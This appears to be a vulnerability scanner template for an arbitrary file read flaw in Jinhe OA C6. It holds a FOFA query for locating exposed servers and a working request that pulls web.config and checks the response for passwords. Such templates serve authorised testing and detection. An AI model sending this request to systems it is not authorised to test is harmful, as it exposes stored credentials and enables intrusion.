漏洞描述
There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
id: jinhe-oa-c6-lfi
info:
name: Jinhe OA C6 download.jsp - Arbitary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
metadata:
verified: true
max-request: 1
fofa-query: app="金和网络-金和OA"
tags: jinhe,lfi,misconfig,vuln
http:
- method: GET
path:
- '{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body,"<configuration>") && contains(body,"password=")'
- 'contains(header,"filename=") && contains(header,"application/octet-stream")'
condition: and
# digest: 4b0a00483046022100e191ed662f64a81fb3c78956494aeccd5234ac1c8e6d95c70d90865e1e85e1cb022100d30280a9ddfc16ba7200e6007f6ab8564c567673a8331646e3fc673dbb1034de:922c64590222798bb761d5b6d8e72950